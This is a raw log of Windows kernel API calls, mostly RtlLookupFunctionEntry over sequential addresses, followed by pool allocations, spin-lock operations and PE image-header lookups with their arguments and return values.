| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2260, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2270, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2280, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2290, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce22a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce22b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce22c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce22d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce22e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce22f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2300, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2310, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2320, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2330, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2340, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2350, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2360, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2370, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2380, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2390, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce23a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce23b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce23c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce23d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce23e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce23f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2400, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2410, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2420, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2430, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2440, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2450, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2460, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2470, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2480, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2490, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce24a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce24b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce24c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce24d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce24e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce24f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2500, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2510, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2520, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2530, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2540, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2550, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2560, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2570, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2580, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2590, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce25a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce25b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce25c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce25d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce25e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce25f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2600, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2610, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2620, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2630, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2640, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2650, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2660, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2670, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2680, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2690, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce26a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce26b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce26c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce26d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce26e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce26f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2700, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2710, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2720, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2730, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2740, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2750, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2760, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2770, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2780, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2790, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce27a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce27b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce27c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce27d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce27e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce27f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2800, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2810, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2820, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2830, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2840, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2850, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2860, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2870, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2880, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2890, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce28a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce28b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce28c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce28d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce28e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce28f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2900, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2910, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2920, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2930, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2940, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961ffce9000 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961ffce9000 |
| MmIsSessionAddress | ret_val_out = 0x1 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffce0000, ret_val_unk_out = 0xfffff961ffce00e0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x4a07b, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c959000 |
| ExFreePool | P_ptr = 0xffffe0003c8ce000 |
| ExAcquireSpinLockSharedAtDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| ExReleaseSpinLockSharedFromDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffce01e8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffce01e8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffce01e8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffce01e8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffce01e8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff961ffce0300 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff961ffce0000, MappedAsImage = 1, Directory = 0x0, Size_ptr_out = 0xffffd0002d573a90, ret_val_ptr_out = 0xfffff961ffcfc000 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff961ffce0000, MappedAsImage = 1, Directory = 0xc, Size_ptr_out = 0xffffd0002d573a90, ret_val_ptr_out = 0xfffff961ffcea000 |
| RtlImageDirectoryEntryToData | BaseAddress_ptr = 0xfffff961ffce0000, MappedAsImage = 1, Directory = 0xa, Size_ptr_out = 0xffffd0002d573a90, ret_val_ptr_out = 0xfffff961ffce7060 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x49d24, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c8ce000 |
| ExFreePool | P_ptr = 0xffffe0003c959000 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffce0000, ret_val_unk_out = 0xfffff961ffce00e0 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffce0000, ret_val_unk_out = 0xfffff961ffce00e0 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff800419b5000 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff962004a1000 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff962004a1000 |
| MmIsSessionAddress | ret_val_out = 0x1 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff96200170000, ret_val_unk_out = 0xfffff962001700f0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x53b9c, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c959000 |
| ExFreePool | P_ptr = 0xffffe0003c8ce000 |
| ExAcquireSpinLockSharedAtDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| ExReleaseSpinLockSharedFromDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff962001701f8 |
